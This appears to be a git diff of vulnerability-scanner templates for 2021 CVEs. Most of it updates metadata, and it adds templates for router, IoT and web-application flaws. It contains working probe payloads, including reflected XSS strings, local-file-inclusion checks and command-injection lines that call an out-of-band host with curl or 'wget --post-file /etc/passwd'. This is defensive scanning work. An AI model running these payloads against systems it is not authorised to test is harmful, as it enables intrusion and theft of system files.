     - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026
@@ -14,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-20038
     cwe-id: CWE-787
-  tags: cve,cve2021,overflow,rce,sonicwall
+  tags: cve,cve2021,overflow,rce,sonicwall,kev
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml
index 2e2a5ad591..ce45ec6f10 100644
--- a/cves/2021/CVE-2021-20090.yaml
+++ b/cves/2021/CVE-2021-20090.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-20090
     cwe-id: CWE-22
-  tags: cve,cve2021,lfi,buffalo,firmware,iot
+  tags: cve,cve2021,lfi,buffalo,firmware,iot,kev,tenable
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml
index 543362500a..c625f4b2fd 100644
--- a/cves/2021/CVE-2021-20091.yaml
+++ b/cves/2021/CVE-2021-20091.yaml
@@ -7,6 +7,7 @@ info:
   description: |
     The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.
   reference:
+    - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
     - https://www.tenable.com/security/research/tra-2021-13
     - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
     - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
@@ -14,7 +15,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2021-20091
-  tags: cve,cve2021,buffalo,firmware,iot
+  tags: cve,cve2021,buffalo,firmware,iot,tenable
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml
index 7a029962c1..cf0a112c25 100644
--- a/cves/2021/CVE-2021-20092.yaml
+++ b/cves/2021/CVE-2021-20092.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2021-20092
     cwe-id: CWE-200
-  tags: cve,cve2021,buffalo,firmware,iot
+  tags: cve,cve2021,buffalo,firmware,iot,tenable
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml
index 4f132c1784..5d50a6801f 100644
--- a/cves/2021/CVE-2021-20114.yaml
+++ b/cves/2021/CVE-2021-20114.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true
     - https://nvd.nist.gov/vuln/detail/CVE-2021-20114
+    - https://www.tenable.com/security/research/tra-2021-32
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-20114
     cwe-id: CWE-200
-  tags: cve,cve2021,tcexam,disclosure,exposure
+  tags: tcexam,disclosure,exposure,tenable,cve,cve2021
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-20123.yaml b/cves/2021/CVE-2021-20123.yaml
index 4f7029d7fc..7eb2c417ba 100644
--- a/cves/2021/CVE-2021-20123.yaml
+++ b/cves/2021/CVE-2021-20123.yaml
@@ -1,23 +1,23 @@
 id: CVE-2021-20123
 
 info:
-  name: Draytek VigorConnect - Unauthenticated Local File Inclusion DownloadFileServlet
+  name: Draytek VigorConnect 1.6.0-B - Local File Inclusion
   author: 0x_Akoko
   severity: high
   description: |
-    A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
+    Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
   reference:
     - https://www.tenable.com/security/research/tra-2021-42
-    - https://www.cvedetails.com/cve/CVE-2021-20123/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20123
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-20123
-    cwe-id: CWE-22
+    cwe-id: CWE-668
   metadata:
     verified: true
     shodan-query: http.html:"VigorConnect"
-  tags: cve,cve2021,draytek,lfi,vigorconnect
+  tags: cve,cve2021,draytek,lfi,vigorconnect,tenable
 
 requests:
   - method: GET
@@ -28,7 +28,9 @@ requests:
     stop-at-first-match: true
     matchers-condition: and
     matchers:
+
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
           - "for 16-bit app support"
@@ -42,3 +44,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2021/CVE-2021-20124.yaml b/cves/2021/CVE-2021-20124.yaml
index 28d24c9763..2d7f258b19 100644
--- a/cves/2021/CVE-2021-20124.yaml
+++ b/cves/2021/CVE-2021-20124.yaml
@@ -1,23 +1,23 @@
 id: CVE-2021-20124
 
 info:
-  name: Draytek VigorConnect - Unauthenticated Local File Inclusion WebServlet
+  name: Draytek VigorConnect 6.0-B3 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
+  description: Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
   reference:
     - https://www.tenable.com/security/research/tra-2021-42
     - https://www.draytek.com/products/vigorconnect/
-    - https://www.cvedetails.com/cve/CVE-2021-20124
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20124
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-20124
-    cwe-id: CWE-22
+    cwe-id: CWE-668
   metadata:
     verified: true
     shodan-query: http.html:"VigorConnect"
-  tags: cve,cve2021,draytek,lfi,vigorconnect
+  tags: cve,cve2021,draytek,lfi,vigorconnect,tenable
 
 requests:
   - method: GET
@@ -42,3 +42,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2021/CVE-2021-20137.yaml b/cves/2021/CVE-2021-20137.yaml
new file mode 100644
index 0000000000..a800f9e0f8
--- /dev/null
+++ b/cves/2021/CVE-2021-20137.yaml
@@ -0,0 +1,42 @@
+id: CVE-2021-20137
+
+info:
+  name: Gryphon Tower - Cross-Site Scripting
+  author: edoardottt
+  severity: medium
+  description: Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-20137
+    cwe-id: CWE-79
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137
+    - https://www.tenable.com/security/research/tra-2021-51
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20137
+  tags: xss,tenable,cve,cve2021,gryphon
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: word
+        part: body
+        words:
+          - 'onfocus=alert(document.domain) autofocus=1>'
+          - 'Send Access Request URL'
+        condition: and
+
+# Enhanced by md on 2022/09/02
diff --git a/cves/2021/CVE-2021-20150.yaml b/cves/2021/CVE-2021-20150.yaml
index f38d6fc263..07d01288a7 100644
--- a/cves/2021/CVE-2021-20150.yaml
+++ b/cves/2021/CVE-2021-20150.yaml
@@ -4,19 +4,18 @@ info:
   name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
   author: gy741
   severity: medium
-  description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and
-    forcing it to redirect to the desired page.
+  description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
   reference:
     - https://www.tenable.com/security/research/tra-2021-54
     - https://nvd.nist.gov/vuln/detail/CVE-2021-20150
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2021-20150
     cwe-id: CWE-287
   metadata:
     shodan-query: http.html:"TEW-827DRU"
-  tags: cve,cve2021,trendnet,disclosure,router
+  tags: disclosure,router,tenable,cve,cve2021,trendnet
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-20158.yaml b/cves/2021/CVE-2021-20158.yaml
index 2a1289ad04..1b984a31bb 100644
--- a/cves/2021/CVE-2021-20158.yaml
+++ b/cves/2021/CVE-2021-20158.yaml
@@ -15,7 +15,7 @@ info:
     cwe-id: CWE-287
   metadata:
     shodan-query: http.html:"TEW-827DRU"
-  tags: cve,cve2021,trendnet,disclosure,router,intrusive
+  tags: disclosure,router,intrusive,tenable,cve,cve2021,trendnet
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-20167.yaml b/cves/2021/CVE-2021-20167.yaml
index 6c5bbd9f69..9f89779fd7 100644
--- a/cves/2021/CVE-2021-20167.yaml
+++ b/cves/2021/CVE-2021-20167.yaml
@@ -3,19 +3,19 @@ id: CVE-2021-20167
 info:
   name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun
   author: gy741
-  severity: critical
+  severity: high
   description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.'
   reference:
     - https://www.tenable.com/security/research/tra-2021-55
     - https://nvd.nist.gov/vuln/detail/CVE-2021-20166
     - https://nvd.nist.gov/vuln/detail/CVE-2021-20167
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2021-20167
-    cwe-id: CWE-94
   remediation: Upgrade to newer release of the RAX43 firmware.
-  tags: cve,cve2021,netgear,rce,router
+  classification:
+    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8
+    cve-id: CVE-2021-20167
+    cwe-id: CWE-77
+  tags: tenable,cve,cve2021,netgear,rce,router
 
 requests:
   - raw:
@@ -23,7 +23,7 @@ requests:
         POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
         Host: {{Hostname}}
 
-        "name":"';$(curl http://{{interactsh-url}});'",
+        "name":"';$(curl {{interactsh-url}});'",
         "email":"a@b.c"
 
     matchers:
diff --git a/cves/2021/CVE-2021-20792.yaml b/cves/2021/CVE-2021-20792.yaml
index dc1a3d0e0f..34ed24fd00 100644
--- a/cves/2021/CVE-2021-20792.yaml
+++ b/cves/2021/CVE-2021-20792.yaml
@@ -1,19 +1,21 @@
 id: CVE-2021-20792
 
 info:
-  name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
+  name: WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors."
+  description: WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors.
   reference:
     - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
+    - https://quizandsurveymaster.com/
+    - https://jvn.jp/en/jp/JVN65388002/index.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-20792
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-20792
     cwe-id: CWE-79
-  tags: wordpress,cve,cve2021,wp-plugin,authenticated
+  tags: wordpress,cve,cve2021,wp-plugin,authenticated,wpscan
 
 requests:
   - raw:
@@ -46,3 +48,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml
index 71cfd7f143..11d9096dec 100644
--- a/cves/2021/CVE-2021-21234.yaml
+++ b/cves/2021/CVE-2021-21234.yaml
@@ -10,6 +10,7 @@ info:
     - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234
     - https://github.com/cristianeph/vulnerability-actuator-log-viewer
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21234
+    - https://github.com/lukashinsch/spring-boot-actuator-logview/commit/760acbb939a8d1f7d1a7dfcd51ca848eea04e772
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 7.7
diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml
index 06831be062..04da03b687 100644
--- a/cves/2021/CVE-2021-21287.yaml
+++ b/cves/2021/CVE-2021-21287.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-21287
 
 info:
-  name: MinIO Browser API SSRF
+  name: MinIO Browser API - Server-Side Request Forgery
   author: pikpikcu
   severity: high
-  description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability.
+  description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.
   reference:
     - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
     - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
+    - https://github.com/minio/minio/pull/11337
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21287
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
@@ -36,4 +37,6 @@ requests:
 
       - type: word
         words:
-          - "We encountered an internal error"
\ No newline at end of file
+          - "We encountered an internal error"
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml
index 0781db97d3..209c9396d3 100644
--- a/cves/2021/CVE-2021-21307.yaml
+++ b/cves/2021/CVE-2021-21307.yaml
@@ -9,12 +9,12 @@ info:
     - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
     - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21307
+  remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-21307
     cwe-id: CWE-862
-  remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator.
   tags: cve,cve2021,rce,lucee,adobe
 
 requests:
diff --git a/cves/2021/CVE-2021-21311.yaml b/cves/2021/CVE-2021-21311.yaml
index 4d2cfa3096..d8481e1aaf 100644
--- a/cves/2021/CVE-2021-21311.yaml
+++ b/cves/2021/CVE-2021-21311.yaml
@@ -1,14 +1,16 @@
 id: CVE-2021-21311
 
 info:
-  name: Adminer SSRF Using Verbose Error Messages
+  name: Adminer <4.7.9 - Server-Side Request Forgery
   author: Adam Crosser
   severity: high
-  description: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling
-    all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
+  description: Adminer from version 4.0.0 through 4.7.8 is susceptible to server-side request forgery due to its use of verbose error messages. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.
   reference:
     - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
     - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
+    - https://packagist.org/packages/vrana/adminer
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21311
+  remediation: Upgrade to version 4.7.9 or later.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     cvss-score: 7.2
@@ -21,15 +23,18 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/adminer?elastic=example.com&username="
+      - "{{BaseURL}}/adminer?elastic=interact.sh&username="
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 403
 
       - type: word
         part: body
         words:
           - "&lt;title&gt;400 - Bad Request&lt;/title&gt;"
+
+      - type: status
+        status:
+          - 403
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml
index 14c9926fee..cbdf424acd 100644
--- a/cves/2021/CVE-2021-21315.yaml
+++ b/cves/2021/CVE-2021-21315.yaml
@@ -1,21 +1,23 @@
 id: CVE-2021-21315
 
 info:
-  name: Node.js Systeminformation Command Injection
+  name: Node.JS System Information Library <5.3.1 - Remote Command Injection
   author: pikpikcu
   severity: high
-  description: The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation
-    before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(),
-    si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.
+  description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information.
   reference:
     - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
     - https://security.netapp.com/advisory/ntap-20210312-0007/
+    - https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v
+    - https://www.npmjs.com/package/systeminformation
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21315
+  remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.8
     cve-id: CVE-2021-21315
     cwe-id: CWE-78
-  tags: nodejs,cve,cve2021
+  tags: nodejs,cve,cve2021,kev
 
 requests:
   - method: GET
@@ -26,19 +28,21 @@ requests:
     matchers:
 
       - type: word
-        words:
-          - "application/json"
-        part: header
-
-      - type: word
+        part: body
         words:
           - "wget --post-file /etc/passwd {{interactsh-url}}"
           - name
           - running
           - pids
-        part: body
         condition: and
 
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml
index 03a4cdb928..2b93b34b34 100644
--- a/cves/2021/CVE-2021-21389.yaml
+++ b/cves/2021/CVE-2021-21389.yaml
@@ -1,21 +1,23 @@
 id: CVE-2021-21389
 
 info:
-  name: BuddyPress REST API Privilege Escalation to RCE
+  name: BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution
   author: lotusdll
   severity: high
-  description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE
+  description: WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.
+  remediation: This issue has been remediated in WordPress BuddyPress 7.2.1.
   reference:
     - https://github.com/HoangKien1020/CVE-2021-21389
     - https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
     - https://codex.buddypress.org/releases/version-7-2-1/
     - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21389
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2021-21389
     cwe-id: CWE-863
-  tags: cve,cve2021,wordpress,wp-plugin,rce
+  tags: cve,cve2021,wordpress,wp-plugin,rce,wp,buddypress
 
 requests:
   - raw:
@@ -28,25 +30,28 @@ requests:
           "user_login":"{{randstr}}",
           "password":"{{randstr}}",
           "user_name":"{{randstr}}",
-          "user_email":"{{randstr}}@example.com"
+          "user_email":"{{randstr}}@interact.sh"
         }
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        words:
-          - "application/json"
-        part: header
 
       - type: word
+        part: body
         words:
           - "user_login"
           - "registered"
           - "activation_key"
           - "user_email"
-        part: body
         condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2021/CVE-2021-21402.yaml b/cves/2021/CVE-2021-21402.yaml
index 4070ee9ee1..d28cbde27b 100644
--- a/cves/2021/CVE-2021-21402.yaml
+++ b/cves/2021/CVE-2021-21402.yaml
@@ -1,24 +1,27 @@
 id: CVE-2021-21402
 
 info:
-  name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read
+  name: Jellyfin <10.7.0 - Local File Inclusion
   author: dwisiswant0
   severity: medium
   description: |
-    Jellyfin allows unauthenticated arbitrary file read. This issue is more prevalent when
-    Windows is used as the host OS. Servers that are exposed to the public Internet are
-    potentially at risk. This is fixed in version 10.7.1.
+    Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk.
+  remediation: This is fixed in version 10.7.1.
   reference:
     - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/
+    - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-wg4c-c9g9-rxhx
+    - https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1
+    - https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21402
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 6.5
     cve-id: CVE-2021-21402
     cwe-id: CWE-22
   metadata:
-    verified: true
-    shodan-query: http.html:"Jellyfin"
     fofa-query: title="Jellyfin" || body="http://jellyfin.media"
+    shodan-query: http.html:"Jellyfin"
+    verified: true
   tags: cve,cve2021,jellyfin,lfi
 
 requests:
@@ -39,3 +42,5 @@ requests:
         regex:
           - "\\[(font|extension|file)s\\]"
         part: body
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml
index 935dd92f63..e0c891203d 100644
--- a/cves/2021/CVE-2021-21479.yaml
+++ b/cves/2021/CVE-2021-21479.yaml
@@ -10,6 +10,7 @@ info:
   reference:
     - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21479
+    - https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
     cvss-score: 9.1
diff --git a/cves/2021/CVE-2021-21745.yaml b/cves/2021/CVE-2021-21745.yaml
new file mode 100644
index 0000000000..867df640ad
--- /dev/null
+++ b/cves/2021/CVE-2021-21745.yaml
@@ -0,0 +1,39 @@
+id: CVE-2021-21745
+
+info:
+  name: ZTE MF971R - Referer authentication bypass
+  author: gy741
+  severity: medium
+  description: |
+    ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould
+    use this vulnerability to perform illegal authorization operations by sending a request to the user to click.
+  reference:
+    - https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1317
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21745
+    - https://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1019764
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2021-21745
+    cwe-id: CWE-287
+  tags: zte,auth-bypass,cve,cve2021,router
+
+requests:
+  - raw:
+      - |
+        GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1
+        Host: {{Hostname}}
+        Referer: http://interact.sh/127.0.0.1.html
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        part: body
+        regex:
+          - 'psw_fail_num_str":"[0-9]'
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/05/21
diff --git a/cves/2021/CVE-2021-21799.yaml b/cves/2021/CVE-2021-21799.yaml
new file mode 100644
index 0000000000..3c93d2ef05
--- /dev/null
+++ b/cves/2021/CVE-2021-21799.yaml
@@ -0,0 +1,43 @@
+id: CVE-2021-21799
+
+info:
+  name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality.
+  reference:
+    - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21799
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-21799
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"R-SeeNet"
+    verified: "true"
+  tags: cve,cve2021,xss,r-seenet
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Telnet </title><script>alert(document.domain)</script><title></title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-21800.yaml b/cves/2021/CVE-2021-21800.yaml
new file mode 100644
index 0000000000..ad5eb3b23d
--- /dev/null
+++ b/cves/2021/CVE-2021-21800.yaml
@@ -0,0 +1,43 @@
+id: CVE-2021-21800
+
+info:
+  name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the ssh_form.php script functionality.
+  reference:
+    - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21800
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-21800
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"R-SeeNet"
+    verified: "true"
+  tags: cve,cve2021,xss,r-seenet
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>SSH Session </title><script>alert(document.domain)</script><title></title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-21801.yaml b/cves/2021/CVE-2021-21801.yaml
index 970f374b80..17e63785ed 100644
--- a/cves/2021/CVE-2021-21801.yaml
+++ b/cves/2021/CVE-2021-21801.yaml
